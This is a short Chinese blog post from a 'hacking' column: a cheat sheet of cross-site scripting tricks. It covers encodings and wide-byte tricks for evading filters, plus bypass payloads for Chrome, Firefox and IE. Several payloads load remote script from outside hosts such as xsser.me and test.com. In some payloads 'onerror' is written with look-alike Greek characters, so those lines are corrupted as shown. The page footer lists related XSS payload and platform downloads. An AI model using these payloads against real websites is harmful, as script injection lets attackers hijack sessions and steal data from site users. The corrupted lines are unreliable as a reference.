xss碎片

最新推荐文章于 2023-10-17 21:25:53 发布
最新推荐文章于 2023-10-17 21:25:53 发布
阅读量798 收藏
点赞数
分类专栏: hacking
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/s98/article/details/9016245
版权
html特殊编码
&lt;          <
&gt;          >
&quot;       "
'               '
\               \
/               /

  • 先加'"></\测试看过滤情况。


innerHTML

\没有过滤
<可以表示为\u003c 或\x3c
>可以表示为\u003e 或\x3e
空格 \u0020 或 \x20

分隔符可以试试/**/

\反斜杠有时候可以转义正常语句,改变语句的执行。

如果gbxxx系列字符集可尝试宽字节
双引号表示为%c0%22
\ %c0%5c(后三位是表示字符)
前半个字符被解释错误,后半个字符解释出想要的结果;

换行符:%0a

josn:http://www.w3school.com.cn/json/json_syntax.asp

过chrome
<!--<img src="--><img src=x οnerrοr=alert(1)//">
"><svg><script xlink:href=//********></script> chrome的bypass
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnSGVsbG8gd29ybGQhJyk8L3NjcmlwdD4=">click<a>

过fiefox
"><script src=http://xsser.me/*****></script>

过IE
IE8 xss filter bypass (xss过滤器绕过)
οnerrοr="with(document)body.appendChild(createElement('script')).src='//test.com/js.js'"

新标签
<isindex type=image src=1 οnerrοr=alert(1)>


「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java xss 参数_“-Xmx1024m -Xms1024m -Xmn512m -Xss256k”——Java运行参数
weixin_34785304的博客
02-16 1550
【JAVA学习】“-Xmx1024m -Xms1024m -Xmn512m -Xss256k”——Java运行参数转载 2016年06月13日 19:33:38 2792年轻代 年老代概念 http://jefferent.iteye.com/blog/1123677JVM的堆的内存, 是通过下面面两个参数控制的-Xms 最小堆的大小, 也就是当你的虚拟机启动后, 就会分配这么大的堆内存给你-Xm...
springboot整合XSS
03-20
springboot 整合预防xss攻击
xss注入点总结
weixin_42299862的博客
07-07 3908
一、标签中间<><> 1、可能存在于:<textarea> <p> <a> 2、可以直接F12在html进行注入(<p><img></p>),如果编码了(<p>&lt;img&gt;</p>)就没xss问题。没过滤则有xss问题(<p><img></p>)。 3、这里补充一个“双写绕过” https://cloud.tencent.com
XSS与靶场(史上最详细附带payload)
qq_34598847的博客
10-17 1267
Cookie 和 Session都是用来跟踪浏览器用户身份的会话方式,但是两者的应用场景不太一样。Cookie 一般用来保存用户信息 比如①我们在 Cookie 中保存已经登录过得用户信息,下次访问网站的时候页面可以自动帮你填写登录的一些基本信息;②一般的网站都会有保持登录也就是说下次你再访问网站的时候就不需要重新登录了,这是因为用户登录的时候我们可以存放了一个 Token 在 Cookie 中,下次登录的时候只需要根据 Token 值来查找用户即可(为了安全考虑,重新登录一般要将 Token 重写)
JVM调优总结 -Xms -Xmx -Xmn -Xss
热门推荐
fcclzydouble的博客
02-23 2万+
Xms 是指设定程序启动时占用内存大小。一般来讲,大点,程序会启动的快一点,但是也可能会导致机器暂时间变慢。 Xmx 是指设定程序运行期间最大可占用的内存大小。如果程序运行需要占用更多的内存,超出了这个设置值,就会抛出OutOfMemory异常。 Xss 是指设定每个线程的堆栈大小。这个就要依据你的程序,看一个线程大约需要占用多少内存,可能会有多少线程同时运行等。 以上三个参数的设置都是默认以Byte为单位的,也可以在数字后面添加[k/K]或者[m/M]来表示KB或者MB。而且,超过机器本身的内存大小
Xss Scan tool
05-25
Xss Scan,一款可以安装在burpsuite的插件,用于xss漏洞的扫描。 专业 好用
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
xss平台源码
09-28
xss平台,可以实现XSS盲打等,需要的朋友可以下载。
XSS payload大全
01-22
总结的XSS的payload,可以直接使用,直接进行攻击,各种payload
名人档案(辛弃疾、李清照)(1).docx
04-23
名人档案(辛弃疾、李清照)(1).docx
._moood UI KitAdobeXD源码下载设计素材UI设计.xd
04-23
._moood UI KitAdobeXD源码下载设计素材UI设计
full_circle_appAdobeXD源码下载设计素材UI设计.xd
04-23
full_circle_appAdobeXD源码下载设计素材UI设计
Gym_Responsive_Landing_PageAdobeXD源码下载设计素材UI设计.xd
最新发布
04-23
Gym_Responsive_Landing_PageAdobeXD源码下载设计素材UI设计
SQL详细介绍资料.zip
04-23
sql,SQL(Structured Query Language,结构化查询语言)是一种标准化的语言,用于在关系数据库管理系统(RDBMS)中存取和操作数据。SQL 使得用户能够访问和操作数据库中的数据,包括数据的查询、插入、更新和删除,以及数据库结构的创建和修改。
一个很烂的项目但是获第二十二届江西省学生信息素养提升实践活动一等奖、第三十八届江西省青少年科技创新大赛二等奖.zip
04-23
一个很烂的项目但是获第二十二届江西省学生信息素养提升实践活动一等奖、第三十八届江西省青少年科技创新大赛二等奖
JAVA文件压缩与解压缩实践(源代码+论文).zip
04-23
JAVA文件压缩与解压缩实践(源代码+论文)
Event_Responsive_Landing_PageAdobeXD源码下载设计素材UI设计.xd
04-23
Event_Responsive_Landing_PageAdobeXD源码下载设计素材UI设计
这是宁波创客大赛 Timer 项目的Github.zip
04-23
这是宁波创客大赛 Timer 项目的Github
xss filter
09-08
XSS (Cross-Site Scripting) 是一种常见的安全漏洞,攻击通过注入恶意脚本来攻击网站用户。为了防止XSS攻击,可以使用XSS过滤器来对用户输入的数据进行处理和过滤。 XSS过滤器的主要目标是检测和阻止恶意脚本的注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值